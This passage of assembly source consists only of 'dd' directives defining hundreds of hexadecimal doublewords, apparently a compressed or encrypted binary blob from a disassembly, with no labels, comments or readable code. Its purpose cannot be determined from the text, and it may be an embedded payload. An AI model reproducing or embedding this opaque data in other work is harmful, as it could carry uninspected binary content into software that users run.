dd 3C33720h, 0EA77D1C0h, 21A44780h, 9C17881Dh, 0C059A809h
dd 229EC8D9h, 5230463Ch, 0D20F8791h, 7D047C46h, 20184910h
dd 31B66A8h, 8140B3E2h, 5F0B0376h, 6A03C003h, 1FF9B6D8h
dd 0B2CB4382h, 0DD625200h, 0F425152Bh, 640A4709h, 15DF1722h
dd 81D68216h, 0FF8C01A8h, 136F261Ah, 8C86ED7Bh, 21C112D3h
dd 0EF86817Eh, 0B799BF0Fh, 499B0837h, 0E35A1F6Fh, 36F24949h
dd 31584BF0h, 4F4981FFh, 0B1081D38h, 0DB3C6032h, 0D83033CFh
dd 0E02BE792h, 8E09AA91h, 0C56F4C9Fh, 0CC06F4C1h, 0AC0DC146h
dd 3E0EA396h, 402F30EBh, 2F9D377Bh, 589AA808h, 3C28A80Ah
dd 45E86111h, 51E75FC6h, 5E0C14Fh, 3800E819h, 0E9C2406Ah
dd 0A65705A3h, 99A2EC8Ch, 512E2050h, 0FFF4A142h, 20031D54h
dd 0E8B08C03h, 1584F0BDh, 0D3F2612Eh, 0F53BBDA4h, 120C2647h
dd 0CB0D6002h, 0C0936032h, 0D2467FB6h, 9663CE42h, 0D1F8B05Fh
dd 4D8F06Ah, 58C00265h, 394FD3E8h, 76B33D8Dh, 4421C116h
dd 3821F206h, 528C83Ch, 16691449h, 200E03F1h, 70498CF6h
dd 0FC447DE4h, 84583DBDh, 0BBB42504h, 847E8D1Fh, 0B1808E01h
dd 42067000h, 710A191h, 2E7F7865h, 32200000h, 9302FBFFh
dd 487003D1h, 443B1586h, 0A826E030h, 795F70C9h, 83020409h
dd 0EDC8B00Ah, 0CED80811h, 41C2234Eh, 92E57D6Dh, 6E254830h
dd 85A6A103h, 0D1D08B07h, 0FB87F78Bh, 0CC5201CFh, 65DF564Bh
dd 75FD60C5h, 837582B3h, 9EAA7655h, 93224D15h, 1F60E435h
dd 34677CD8h, 76AD20CBh, 527F1C4Bh, 3E80465Bh, 0FA7500F7h
dd 5DAAC846h, 0E1286B91h, 0D9B12EACh, 76F27D25h, 20BD2B8Ch
dd 8789D051h, 0B2E203F5h, 0C90235EAh, 1D7E5068h, 10C6E152h
dd 0B12AC130h, 6B930D71h, 0E02DE4A1h, 67951179h, 0A4B24B76h
dd 0E7861AFh, 0FC353Eh, 6C4C1008h, 0F4F123CEh, 0B8755F2h
dd 0C323672Fh, 3634A1D9h, 0A3872935h, 0AA830034h, 0D396501Ah
dd 35BE12C1h, 38DF0A20h, 8B184C33h, 3814682h, 83CC470h
dd 87B9D4B3h, 2040233h, 0A04DECCFh, 4D3ED2ABh, 8F099328h
dd 0B1354B09h, 4E2A1908h, 102ADF74h, 0F502BE22h, 6AF9892Bh
dd 24C1972Eh, 0C5B003FEh, 20594277h, 0D1996497h, 0BED50F7Dh
dd 0B94AF808h, 309F28EDh, 6B0E0D03h, 4327603Ch, 8698105Ah
dd 19C0D911h, 0A9BC553Ah, 144D65EEh, 0F4C76B25h, 2CDBEDDh
dd 88EF7B13h, 8ABABFA5h, 213AF38h, 16723DDAh, 6A0A59A3h
dd 842BB23Bh, 53108D83h, 39DA22D7h, 8287ACF4h, 830E8A3Fh
dd 2C05B7C6h, 0ED51DCECh, 288803C2h, 0F1779323h, 0A9C2B87Eh
dd 245E1CD9h, 6CA5D94Fh, 3F87F77Dh, 5186CFF0h, 728F902Eh
dd 537C729Bh, 5AA0046Fh, 0C2906AAh, 873E3C27h, 0DDA92055h
dd 0AB51715Eh, 0AE285F50h, 885EAC52h, 75FF3Eh, 9EAA5FACh
dd 845A97E8h, 2AB02A77h, 8A78125Eh, 0C1D7BE40h, 30000028h
dd 217AE3D9h, 9C9D326h, 0E33871B3h, 449C482Ch, 6D90A421h
dd 2B782218h, 24C980D2h, 2F846001h, 0A9CD821Ah, 92148189h
dd 843FC94Fh, 0DF38BD08h, 0F69E15ACh, 6ADD80C1h, 168DABBFh
dd 30CE0887h, 8F3825DDh, 60390326h, 4FAA4266h, 0DB6E03D8h
dd 950E6429h, 5617EBBCh, 757FE096h, 42A3564Bh, 8150449h
dd 864FBECCh, 13BB44A5h, 0FD103919h, 17E820Fh, 20040000h
dd 934E309Dh, 5940D926h, 0BD1D0E54h, 0C6E2E490h, 8A06AAA9h
dd 4358C8CBh, 529D72E1h, 3DC9E60Eh, 64096FB2h, 417C980Fh
dd 2C2C8830h, 0CA8B9F14h, 3CF04A03h, 0A150498Bh, 293C3197h
dd 0D665117Bh, 776BB681h, 7C51B114h, 81368D05h, 89C23D9Eh
dd 5570D42Ch, 0AEA9DB6h, 8D348020h, 0F83234E8h, 0B2BF0D5Bh
dd 8518DD87h, 0C76FB1C2h, 839FF51h, 0E8B7373h, 0E9DC0189h
dd 70BE1240h, 7DC90848h, 0CC7D666Fh, 82F17C9Bh, 0B9549311h
dd 5901D4C0h, 0EE0E2D81h, 75A7AD04h, 0B8F35084h, 248EFBFDh
dd 0B1631B22h, 0B80FCC3Dh, 8D0D8226h, 2322D028h, 804E2756h
dd 8416DC38h, 0BAFF5671h, 978B197Bh, 465EC916h, 1698A4B2h
dd 98BE6C8Ah, 0D85ECB63h, 0C911FB2Ch, 5BD7ED82h, 7FB6EE62h
dd 0D54079D3h, 44306321h, 0E270C921h, 0EBB4124Ah, 0D014D05h
dd 7E21E6Dh, 250271C0h, 692DF1B8h, 44240726h, 13883838h
dd 5E4F0564h, 8D3F85B4h, 0A00503FCh, 10F1C1EBh, 0C0033187h
dd 47DAA052h, 84122607h, 28F18343h, 9210FE9Dh, 0ED17807Ch
dd 83DD059Ah, 0C27307C6h, 4862801Ah, 0AE511D90h, 0A9B10389h
dd 0E2D1ED48h, 0BDEE04F1h, 103F7Fh, 9350D46Eh, 5B1F6ACh
dd 0C90AF27Ah, 5A498B51h, 66581104h, 0EAAB364Bh, 0B1E7BA1Fh
dd 2B2742FEh, 795A38A2h, 4ED40059h, 204D9204h, 0E46B0917h
dd 380C5604h, 0DF49383Bh, 6190583h, 0E0B9FB28h, 0BE75069Dh
dd 0B7C314E1h, 0F389F08h, 31D6A4C9h, 0C1494787h, 0C85639A5h
dd 386A17F8h, 0EF4FCE4Eh, 64BE6A24h, 68840E23h, 390FC077h
dd 5E1E855h, 0D6EAF46Dh, 89827D1Bh, 45375C7Ch, 7502B9C6h
dd 27509370h, 3E352819h, 405E5A87h, 0CC806E88h, 0E9253C93h
dd 2CA9766Fh, 72008C00h, 0F7E9BE80h, 0F18E08F3h, 7294D9D4h
dd 0C73685A6h, 6226A079h, 301E56Ah, 80E8032Fh, 0F24BDE6Eh
dd 0FD2CD0ECh, 0BA02F07Ah, 9C09DF8Eh, 0A7213734h, 962D5DA0h
dd 8BEE906Ah, 5B760CEDh, 0FB1228E2h, 4BF716D0h, 57D8D438h
dd 3792FE0Fh, 5012B770h, 9D618778h, 3936301h, 0D22485EEh
dd 5AB40020h, 238D140Fh, 0D561636h, 5228F63Eh, 0B8D37AF8h
dd 87205D0Ah, 5141D89Ch, 0C6322A57h, 5256F028h, 14E82554h
dd 550E96DDh, 0E845811h, 56DDB4C0h, 76BEB538h, 5F41FE03h
dd 0BAE19022h, 0E8A2B002h, 0A29549A1h, 17262CA6h, 606DC09Eh
dd 0B5E5E32Fh, 0ACDDA0BAh
dd 0FD56906Eh, 2AFB8B38h, 41025232h, 434C8551h, 0FC1B6h
dd 53438551h, 0AD79203h, 0B8D603F8h, 46055E43h, 835F4548h
dd 460507E2h, 4A0D5544h, 4D4842Eh, 80458C0Ah, 0D0636BB7h
dd 0C2064101h, 15FE790Ch, 0F1C11E9Dh, 1BB8AA84h, 6CB9C088h
dd 0C51BCCE3h, 0B224E050h, 763A465Dh, 0DA1C26BBh, 0CF18D783h
dd 0B44E54Ch, 831183BBh, 79742B50h, 672E87C6h, 2180EC21h
dd 740615BCh, 41677835h, 18200262h, 884BF115h, 3A41BEC2h
dd 3E1A3E02h, 516412A0h, 94B8A56h, 964ECA18h, 0DEC2067Ah
dd 22F7C23h, 9AF56BEBh, 1DF7090Eh, 1B8777Bh, 80C5B200h
dd 8CDD9204h, 0E2F6B08Eh, 6630D25Eh, 2603A56Fh, 65958272h
dd 2B15C3Ah, 0F1C10E6Dh, 0C831BD49h, 82516041h, 64A84D13h
dd 0FC5A4C3h, 0BE2124E5h, 3B9A59ADh, 7E08F86Eh, 0F007A501h
dd 1CB21200h, 5A762792h, 0BC245FC3h, 5C04B0DFh, 0CBD6226Eh
dd 0FB58CF22h, 0A26414A2h, 14938E8Ah, 0B0C99422h, 0EF3D0EB3h
dd 38CEC25Eh, 0AB6679FBh, 6A03C38Bh, 1EC2BC3h, 195A8F63h
dd 8BA96F7Dh, 5631A7B3h, 203F0D5Dh, 8F42C55Dh, 8D7631BBh
dd 0DED99200h, 0D98BA50Eh, 0F0154F03h, 0DC024D14h, 1DFBBD1Dh
dd 7D6C01B4h, 0C3AAC38Ah, 80B3706h, 213E037Dh, 1804BD34h
dd 66F1DA1Fh, 0F0C465Fh, 16A0C102h, 84B13D53h, 0C2F624A5h
dd 0B1C1C40h, 0ADB0E825h, 34301862h, 0F8DD246Ch, 21365D6Dh
dd 0C3AB2789h, 51F00854h, 0AAC1B07Dh, 41419D1h, 0DA048962h
dd 0CB06033Fh, 0C18241FFh, 3B6707EAh, 587B9E0Dh, 93E8988h
dd 0F1AA278Fh, 0F2C19Fh, 411AEF58h, 455DD90Fh, 6213411h
dd 0CA2F4847h, 724C6E2h, 2F226C8Bh, 0B4B6F00Ch, 0B228AB15h
dd 0C3622260h, 0F0AF989h, 0AA8A68B0h, 3C8AF624h, 480AB57h
dd 0D7BEB2D1h, 0FFFFF8C6h, 0AFC9228h, 8AC3B07Ch, 48CE12E2h
dd 0E8A7A241h, 0A9EA8810h, 80022F0Fh, 2366F682h, 0DAA9C503h
dd 0B21EF8CCh, 4364D478h, 1D9209B1h, 3C8C1061h, 0AB56D918h
dd 6D852A36h, 990D63B0h, 0EF631C7Bh, 0BD1B7A7Dh, 3889E058h
dd 5B458CC3h, 88DB4B31h, 8ADA0495h, 0DAA35AB7h, 1C834226h
dd 0ED3C2C15h, 92195405h, 59D11920h, 0EE289BEh, 49B49DCCh
dd 0F5FED9EDh, 714F6C7Dh, 9F4A089Fh, 0BC1B63EDh, 2BFAFE61h
dd 6D148BC9h, 9E2C6681h, 8666481Fh, 0C51F84C3h, 0D079AEBh
dd 5BDF03D7h, 7CDA4D2h, 120688F5h, 8D565185h, 115B024Ah
dd 0AC3C49E4h, 0CF7555DDh, 92057Dh, 7E634082h, 0FA802962h
dd 8FDE17C3h, 42008003h, 0D2FBF8D9h, 0D4C7B2AAh, 35756206h
dd 0D4BFB800h, 91ABAC35h, 5C3E434Ch, 0EE9F8C91h, 4DBE03B7h
dd 2BDC290Fh, 30479DECh, 0A45D5E00h, 0C724439Bh, 0F168EDEDh
dd 0BC850FC2h, 55D49D21h, 1CDC3596h, 2908E20Ah, 0E0DC310Ah
dd 1C791323h, 0C5266E90h, 129F2F86h, 60E61D1Dh, 96F58937h
dd 0EC9E76A0h, 0ADCA507Bh, 22C7E126h, 95408CAh, 807D1164h
dd 0DEB100FEh, 0A88A5CDDh, 0D5A86C10h, 1E446602h, 616C2F6h
dd 18BB1609h, 1DEE24DAh, 72255098h, 0F981F110h, 61A3C1E8h
dd 0FFFCD77Dh, 792450FFh, 0ECE9E200h, 0B83B17h, 0C28A2277h
dd 0C1D8FAF6h, 0A0AB08C8h, 518B8A48h, 2001C409h, 6144DEC5h
dd 8BF5418Eh, 9014ABD7h, 0FFB0575Ch, 478DAAE9h, 2BCE0304h
dd 8AD8040Bh, 0D081A1ABh, 0F6BC060Bh, 0F4C1C9h, 8721CAAh
dd 0EF176BDh, 0BA61A735h, 0FAFDBAEh, 67108BB3h, 3403C203h
dd 0C3B17BC2h, 0EAC2B01Eh, 9220CB61h, 0BD0E61BDh, 818A0307h
dd 7E2E34C3h, 0EEF4C38Ah, 8444E4A5h, 1A9062D9h, 4C398836h
dd 0CBA5686h, 0F68F45D4h, 65CB0476h, 0E80B8A17h, 0EA214B40h
dd 2C6270ABh, 28185954h, 10961636h, 86025160h, 8A3A894Eh
dd 0B2461C6Bh, 1416CD3Dh, 0E026C9CBh, 782840EAh, 3E98FC03h
dd 1A1DC045h, 9D9D2E75h, 529E766Eh, 72A4788Fh, 66780A38h
dd 87EF4138h, 47157853h, 5BE6680Bh, 22555532h, 8D833DD0h
dd 0B09E6413h, 58A0BA7Fh, 0B9B3AACAh, 7742889h, 42148ABEh
dd 0F3658F4h, 78230319h, 498B08F8h, 3CB6840Ch, 4920391Ah
dd 5A0E44EEh, 1F0956A3h, 0FFD002EDh, 0AAF564D3h, 31FF804h
dd 54A5DEE9h, 3EBC69BBh, 0A76A7A04h, 25A789E3h, 0D27578D8h
dd 0C6235970h, 70270867h, 0E57A93D6h, 87D00964h, 0D9309501h
dd 0DD351361h, 0FB3FFA09h, 0D08B068Bh, 75CC3CF7h, 2007F97Eh
dd 0B72A8787h, 9A5118B8h, 9B408B15h, 7FCF0506h, 31422160h
dd 89CA0238h, 89591ACDh, 60950FECh, 80EB6540h, 10462DD1h
dd 10824AE2h, 20CD1D92h, 771A2154h, 0B0FF3B37h, 0E9ACAA90h
dd 0FFC1FE7Bh, 283E19FFh, 0BD4FA1EDh, 1C4D7208h, 52AA3393h
dd 58DF1C9Ch, 3141ECC9h, 20D5EC62h, 0B589979Ah, 0C39E4804h
dd 0EA80265Dh, 1F8B338Bh, 588B0A70h, 3C573D40h, 9A1A00EBh
dd 0E4802EEFh, 3DB566F0h, 370CB3ABh, 3C766029h, 2DCD09E8h
dd 0E0D3123Ch, 531BA984h, 0E0B63CFCh, 1BFE1B09h, 0D9703CF0h
dd 92BE1109h, 38FF2566h, 10FF34DDh, 3A020EB3h, 0F8582009h
dd 0F6E81B1Fh, 970004C0h, 821483E2h, 41628774h, 14198C6Eh
dd 2810EE9Bh, 801CE146h, 41222449h, 9BD88478h, 9E8C6E98h
dd 0D1978034h, 22722075h, 586F2FCDh, 0E2F39159h, 0AA3EE9A4h
dd 0C97BFB56h, 1A30417Ah, 0BFFDBD70h, 3B1B61Ah, 3DB6FC4h
dd 0E3808B6Bh, 0D4690E30h, 813E3EB0h, 7A61A4DEh, 8B23AFB1h
dd 951C2C87h, 0C92D0DC6h, 37018C78h, 0C4FA141Ah, 0EE53B195h
dd 595EA895h, 78819B8Ah, 0B01A827h, 8C05D969h, 0B2068D8Ch
dd 0E55E0F03h, 0EF410D80h, 79518B2Dh, 3A10FF88h, 0D8DA1CF1h
dd 24513B85h, 63661B22h, 787C843Ch, 0A9A0ED40h, 5830178Eh
dd 0BC4DEBF4h, 78AA9193h, 8B493B2Dh, 0D02413C6h, 0D587612Eh
dd 0D640846h, 962E9397h, 8CE38B67h, 0E87A98B4h, 0CD93774Ah
dd 3BD65581h, 0CB262725h, 0C5279F03h, 0D9766494h, 1EC49AB1h
dd 4ADE3B18h, 0F571F23h, 0D89255A3h, 7D8C968Ah, 77EB4088h
dd 1FF734h, 5CBBA3DCh, 84A58755h, 80171967h, 1C58B0B8h
dd 5208389Fh, 0A8EC5921h, 0CF1A86E4h, 1543FE23h, 0B6A8E564h
dd 0B2AD6C8Eh, 4632AA80h, 894503FCh, 0B23F0873h, 432F68AEh
dd 0C9C4B3FFh, 0CE6B20D7h, 869955D7h, 0A1E1D92Ch, 8387618Dh
dd 0D27BD793h, 4394E063h, 7FC9C10Eh, 0F77163B3h, 0CFE92C1Bh
dd 0C3F5C617h, 9254815Dh, 5723CF4Ch, 0F65119CEh, 27EF8DF1h
dd 64279331h, 1AF9061Dh, 0EB1A9F9Bh, 0C5232CB3h, 0FB301E39h
dd 0D2C4A03Bh, 0A8D5871Dh, 0A85CCF74h, 4A21894Bh, 0BD3D2885h
dd 32ABEACh, 0AA20C521h, 8C94C4Eh, 1A19804Eh, 5E0F9357h
dd 0D6A7903h, 6B3AA44Ah, 8E265CBEh, 0DB43A430h, 1CACAFD8h
dd 4E46271Fh, 0D02D881Ah, 0D882DCC4h, 99C62BABh, 7425D0A9h
dd 0B00AD458h, 5E33D89h, 0E505B154h, 9E03DC9Dh, 0E8479D3Dh
dd 6878E230h, 25B50950h, 3DDFD04h, 6A023387h, 0E6214434h
dd 63943062h, 6E0C535Dh, 0FADF8B33h, 0F7242640h, 20EB0694h
dd 0B669BF10h, 0BB3C04DBh, 0D697459Ch, 3000A2F2h, 0C89D2AEh
dd 3230B98h, 189A94EFh, 64538E28h, 4E9AAFh, 89344612h
dd 67373D08h, 5A4C7F33h, 0C3595F5Eh, 5E4CB78Bh, 0C4E853h
dd 347EC08h, 61418086h, 881FB200h, 36820864h, 0C1460000h
dd 8D89Fh, 5A103003h, 2017F844h, 0E60EB02Eh, 3760F7AFh
dd 395010Dh, 5F83410Dh
dd 0C8036041h, 0B05040h, 2002D821h, 64201717h, 9DF2C03h
dd 55820B2h, 2076DF94h, 0F7B05003h, 212F02E3h, 3761708h
dd 0B74818C0h, 774B03B6h, 6C1F840Dh, 0BF65232Fh, 0C820020Eh
dd 36005857h, 8030708h, 0B2006F19h, 0FF3B03h, 722EC05h
dd 0FF070036h, 0F0525h, 0B20020h, 40928903h, 1C9319A1h
dd 6C876541h, 5F60231Fh, 0B047C906h, 90B2741h, 28004B1Fh
dd 872AFF64h, 0D2FF2B5Bh, 0E280C02Bh, 0FF018AF7h, 83140B41h
dd 7508C2F6h, 0F63CF2FFh, 0F73C3274h, 3C2EFD74h, 3C3774CDh
dd 0FB40110Bh, 7580C6F6h, 407B044Eh, 7B1E6F75h, 9507520h
dd 0E858045Bh, 802BC18Bh, 0E281845Fh, 9A5D0707h, 0C602FDC2h
dd 0CE80C35Bh, 380128BEh, 7D5D275h, 0AACDA92Dh, 39AF5B04h
dd 7C56D26h, 0C0DFE616h, 83A0945Ah, 83BFFA89h, 0B175FFFAh
dd 0EBC2FD8Bh, 20F680D1h, 0B7751C5Bh, 0EB2106ABh, 0F280A6F6h
dd 10F65702h, 0F607A875h, 11A3EB06h, 5BC60CB6h, 0C5B07A0h
dd 8A38779Bh, 25DB66E0h, 0EFFC9F07h, 248374C0h, 43C2DFBh
dd 0B6160575h, 0F6120724h, 4177440h, 87480E0h, 5F89FDFh
dd 61A8850Fh, 0CAF60F06h, 759E904h, 51E9013Ch, 6EF19CEh
dd 99290E74h, 3D23B6EDh, 0E9023D1Bh, 0E807D835h, 0BCD81B97h
dd 9191E89Eh, 93815F90h, 6F9B9E90h, 8D9D9604h, 868D9EF6h
dd 7DCD19DFh, 8991EDB6h, 156F119Eh, 0FE8D9A89h, 9190968Ch
dd 0CB9990DFh, 45750520h, 5E02E8F0h, 1C3DE270h, 3DB3221h
dd 8AC643C3h, 0EA7A1983h, 0BC3E34EEh, 5212F010h, 6A034A48h
dd 4153A801h, 162240F4h, 0CE98F384h, 7E7AB024h, 969F5331h
dd 0C18378h, 8F90800h, 57A25D27h, 58502532h, 68172CD0h
dd 0D7432AB5h, 204FAED0h, 60BDD410h, 183D70A3h, 7E8D2A61h
dd 18BA3CC1h, 4CAC203Fh, 66A03188h, 0B30E691Fh, 19EF0D00h
dd 0D2C08F47h, 0C5ADE06h, 1CF40D6Eh, 4CB00B3Ah, 2990B000h
dd 54C27918h, 0C3347D1Dh, 75800522h, 3574ECD9h, 0D17C20B9h
dd 0AB61640Eh, 0F9DED464h, 8F64D6F9h, 5BB31213h, 6A87C5D9h
dd 966C6135h, 80F0AA28h, 226BBA44h, 8266859Bh, 80EF06CAh
dd 0F0D0D016h, 8A016AC6h, 0EE08B09Ah, 74C10FEBh, 28436Bh
dd 60C08BA3h, 5793D954h, 0A5F1A1FBh, 8B62E458h, 0E43C2DACh
dd 4D2415D5h, 6A810F3Bh, 0FC66ED4h, 69E2FBD1h, 35133D15h
dd 30F3112h, 0CAB2AFAh, 0B015D084h, 190B83F7h, 0B950AA9Dh
dd 3929F437h, 0C5096410h, 0BC425B2Bh, 0C65ACF8Ah, 37B6020Fh
dd 7163019Eh, 3B08460Fh, 1708C2D0h, 26510460h, 0C166C1CBh
dd 620F250Fh, 5C6BED03h, 0EFD50812h, 0EC658A8h, 10AAB539h
dd 5160E100h, 81D9FF15h, 68B12404h, 603ADEC5h, 46343009h
dd 18A731B1h, 0BFED7A8Ch, 1D068784h, 2173800h, 0F71F6866h
dd 8D806F4Eh, 0ACAE8CDCh, 0D5A31905h, 9EFC9674h, 0EC6F82Dh
dd 683BCD5Fh, 46B58C4Ah, 5D7E1ADBh, 89468057h, 0BC7C247Dh
dd 0C90065Eh, 0A0F724B7h, 0C9BAD04Fh, 55D89A0Dh, 66A3201Ch
dd 4DB1570h, 12C3B380h, 0CAB801Ch, 0FA067C7Bh, 89BA6008h
dd 35960BDh, 0C13B189Fh, 8B48DA31h, 0B8E120E8h, 2428AB02h
dd 21EB188Fh, 322485AFh, 5F1A4284h, 2BDC8A4h, 1CD7DAABh
dd 6D9D814Ah, 80E95CE5h, 1E286ED7h, 262EFD1h, 9667DA31h
dd 796FC468h, 170EDE58h, 9403DFD2h, 0FF108AACh, 1088D2F6h
dd 75D28440h, 2ACA8884h, 362285BAh, 2E82ED59h, 40C709E6h
dd 47178A3Dh, 2483E79Ch, 0E8C150D1h, 750095DFh, 40726573h
dd 0B7A28516h, 95893D1h, 6A3811DFh, 24BC8110h, 8E3FB040h
dd 7C49704h, 845F6404h, 765B08Fh, 49A87EA2h, 2DC1A03Bh
dd 9B413C8Ah, 0C411F483h, 0D82A01Ch, 6FDEE0A6h, 25EF2B2Bh
dd 6ED5E010h, 6A4F23h, 0A6550AF8h, 67611590h, 0FDD517F0h
dd 83A1B455h, 0B8142414h, 0F474421Dh, 61F32D0h, 6FCE4834h
dd 0CBC61E50h, 44046889h, 52B0B5C2h, 2F82B2DAh, 6AC5D9h
dd 2B20C219h, 0F32FB2h, 0CF11800h, 0C6816D1h, 26871561h
dd 209208F8h, 0E1AF9909h, 80D6B765h, 56039FBBh, 0FC2F5EA2h
dd 2408C3BFh, 1A6310C6h, 0BBABC1C1h, 714BC156h, 17679044h
dd 684DFF6Ah, 0A8D2A271h, 0E8F85053h, 0FFFF28F8h, 62A87290h
dd 0C4DAADFFh, 91217BFh, 10790118h, 69F6736Eh, 51B335C9h
dd 0EFE4E912h, 0F72DD508h, 5F34BFE8h, 18990894h, 0ED08614Eh
dd 0D9E92919h, 0A02C2DC6h, 0E2E78D3Ah, 0CF9AD70h, 0B2129094h
dd 0A826AE21h, 0BD8D09FFh, 0A8835Fh, 70A8DF90h, 0B1106EB9h
dd 4B4BF327h, 92708A42h, 86144760h, 0D2458FF9h, 49A6DCD1h
dd 0C125F598h, 286592F0h, 0D23761FBh, 0C42752C0h, 8A21E11Ah
dd 66C99738h, 77E07CAAh, 0E91B2301h, 75EE7F41h, 0CCFC6A08h
dd 74A6FC8Bh, 5F7C52FDh, 88F7E303h, 91F8B013h, 2C085096h
dd 0DFB49788h, 5552922Eh, 5CE59592h, 99302C52h, 20E02101h
dd 2401864Bh, 6A31A8D6h, 4B1DA816h, 439CBF7h, 0E4FC9A86h
dd 0FF584E63h, 0F58040D6h, 0A44275C4h, 0CE85FEAh, 0E00D96E9h
dd 858C338Dh, 68D307h, 6E6262Dh, 83507D3h, 96753595h, 5EC9086Ah
dd 457DB41Fh, 8D03E312h, 448BDC8Ch, 0AE88C60Ah, 5D90EFA3h
dd 6CB79407h, 129C12h, 0F3B2416h, 1BD4329Bh, 0A7A2984Dh
dd 4F16AD2Bh, 0C21BF4Ch, 880EEC0h, 643903F8h, 0C87A14Fh
dd 0C1A2E308h, 1F00B386h, 0BE458FEDh, 642EE004h, 34571AFh
dd 413102D9h, 8F5533B1h, 517A74F2h, 90C82E3Eh, 81A6602Ah
dd 14022FA8h, 0B4034BB7h, 9B92555Dh, 3A0ACF22h, 22080472h
dd 0AE20CDEBh, 2FEE462Dh, 0D3354306h, 9B68F3EBh, 9CA9AC79h
dd 0D81BC432h, 0FFF6E98Eh, 0BC0E0AFFh, 5006400Ah, 82F7B520h
dd 0D68DDD09h, 0AC5AB20Bh, 15F790FAh, 2B446039h, 39361718h
dd 24084C1Fh, 2943D822h, 63514674h, 22A4757Ch, 5170FF2Dh
dd 0CC48370h, 81DD0D12h, 5FC6C724h, 81E0C70Fh, 0B72B39E1h
dd 7D107092h, 0E7FF4768h, 0F234F1C7h, 65D15F4h, 81B903ADh
dd 192CBC4Eh, 0E0B1610Bh, 3513841Ch, 7E7CD446h, 0F24972Dh
dd 0EF3DB7D9h, 8355CA35h, 0A01E26D7h, 5836310h, 99128918h
dd 356668FFh, 0D5C1E297h, 235800F0h, 0E03C8C0Ah, 0E02E850Fh
dd 0CDBA9998h, 1FB656DFh, 0FFE69A2h, 2405E75Bh, 8C09B1E0h
dd 3A1A8098h, 128B974Eh, 1076181Eh, 3F49D60Dh, 43B468E6h
dd 736884CDh, 4E5282F7h, 0F8593BC1h, 0B5EF0021h, 3259AADEh
dd 519B407Ch, 0A4252609h, 26C2061Fh, 7DB5C152h, 4285759h
dd 0AC46913Ah, 210EC1EDh, 82E90DC1h, 0D4248A99h, 0E154085Dh
dd 0FDF89AC3h, 0C1F2997Fh, 80F312CAh, 0F39A1F85h, 7FE3E283h
dd 0CAAE9BE8h, 0E85BE265h, 0FD1B8E0Ah, 0F213EB80h, 0F84BF383h
dd 0C158EAD3h, 5E606FE3h, 0F872F94Ch, 5F28B01h, 930F6E0h
dd 3BF34CF6h, 0E001FD37h, 245358Dh, 2BF3F573h, 0C3908DD7h
dd 55DFDE62h, 0BF0F03C2h, 76CAD6ABh, 0ED404B38h, 0A60E23C2h
dd 0CCF054EAh, 8D88B34h, 835AFF29h, 80F373EFh, 0B0BFA2C2h
dd 0EF795BAEh, 0FC073FB7h, 0DBF7FC1Ch, 0F24DCA83h, 0F0CAEC5Bh
dd 3CF381E0h, 1FFDB2B7h, 0ED885AE0h, 0D6A06EABh, 0C0C20DABh
dd 0FFD65B14h, 12A481B1h, 7C5BDB60h, 0F34EFBC0h, 461FEBC1h
dd 6B5AEE3Fh, 3B866ED2h, 2D09DFF2h, 0DB0FF2DDh, 0B603D2BEh
dd 0E121DAB7h, 120A73F3h, 0B4E4A471h, 77556373h, 1BE4EAEDh
dd 16659ADBh
dd 174F70BEh, 0ED0FB378h, 5B2A973h, 0B49DC1FBh, 7603D27Fh
dd 3E0AC017h, 0A27352C1h, 97B414DEh, 0B715C147h, 0C3DD034Ah
dd 0B0C40B67h, 0B3F72CF3h, 105928A4h, 1711BB0Ah, 0A373ECD7h
dd 0BAED0DB2h, 3FE8DB06h, 0E3EC5803h, 0FB11A473h, 237A78B4h
dd 77038B3Bh, 0EE128E7Ah, 0DD19A573h, 1512CCC1h, 9B3E0775h
dd 733D0325h, 7E8FD6A6h, 20C15E11h, 9D6C0BC0h, 0BAA76621h
dd 0DB0E3B95h, 0AC141D06h, 0B0ED4D7Fh, 217B10Dh, 0D62D697Dh
dd 730A0110h, 0D0135DBCh, 8DA8B073h, 15ACC177h, 2FF45159h
dd 0B63CD903h, 0B29AD8F8h, 0B2A9733Dh, 0C6DB7580h, 0A67D41Ch
dd 0E50BAF7h, 0A23EEB34h, 25193D0Fh, 6DF571ECh, 7ABB02F7h
dd 0DB9A423Dh, 0A100B2B3h, 0D6F641F6h, 0B53E17AEh, 0FDC0D516h
dd 9B72B4B0h, 0E05F845Fh, 889CEDB5h, 34DD0E6Dh, 6795122Eh
dd 0ADB16B49h, 3F22FB38h, 9B6D616h, 0D842D91Bh, 24F0CF09h
dd 0B325B5F6h, 49370E10h, 2244BB22h, 0B323E0B5h, 0DE325B9Bh
dd 0CE165811h, 5C47DD00h, 2CB4836Bh, 300E646Fh, 2E0C7F25h
dd 0B3D82FB5h, 0E9D92353h, 675B3653h, 0AA8F6B4Dh, 0B6B2BFB5h
dd 0CE5E2B43h, 0BDCFBC4Ah, 166F27BEh, 6308E87Eh, 3964C012h
dd 190972DEh, 58D4CFEBh, 639AE3F6h, 0B5581C0h, 425AB66Ah
dd 5C26E128h, 0DFC1B652h, 5CD43622h, 499E954Dh, 9E315BE2h
dd 14F2F5D8h, 234241C2h, 54E3F635h, 3485D238h, 67185D87h
dd 80A273ECh, 176331ECh, 0C72A4251h, 0EFA4077Dh, 22DF08E1h
dd 246A7684h, 0B3E5F842h, 0C8235BE7h, 6AA9C28Bh, 0CE94C178h
dd 14C673FAh, 0B051C953h, 0C1DF9E0Eh, 0C059EDB5h, 0C3850B16h
dd 28B4E121h, 36059905h, 0DD23C1D8h, 0DC9E7E03h, 0B7E19AB9h
dd 0B2D8BF20h, 7AB5FB54h, 7A0461FAh, 77B56ABBh, 1BB12F36h
dd 6C5B7DB2h, 0BE107A61h, 1DA9B516h, 4508DC96h, 7F5BBD74h
dd 0F311D6D9h, 8E174D2Dh, 0C2B2A9C2h, 0C62B6F30h, 8B2CA0B7h
dd 0DADB72Fh, 3DB68160h, 15E8BE50h, 0D6E4B07h, 1E6F6643h
dd 6F1467EAh, 11F3B004h, 64BA1763h, 9B4DF76h, 27B5C626h
dd 6330AF47h, 58605812h, 0C62929C3h, 0B56B101Fh, 0AC6C67A1h
dd 0C4C2868Fh, 0F9ECA534h, 7CC2610Fh, 9FF4726h, 0B331B530h
dd 4E670A4h, 6E857123h, 0BD759F08h, 4F278D3Ch, 64143193h
dd 0AEEAC609h, 0C655057Bh, 0CD80B57Dh, 2A3CFFC7h, 0CB32BB5h
dd 0F6243475h, 0F6160452h, 2A6232DCh, 0ED340537h, 0D81984DDh
dd 0D90F33A4h, 9F73A94h, 592CDD24h, 96CC43Ch, 0AB9BB064h
dd 32DE26F5h, 39797686h, 510EE103h, 0C9732661h, 613F922Ch
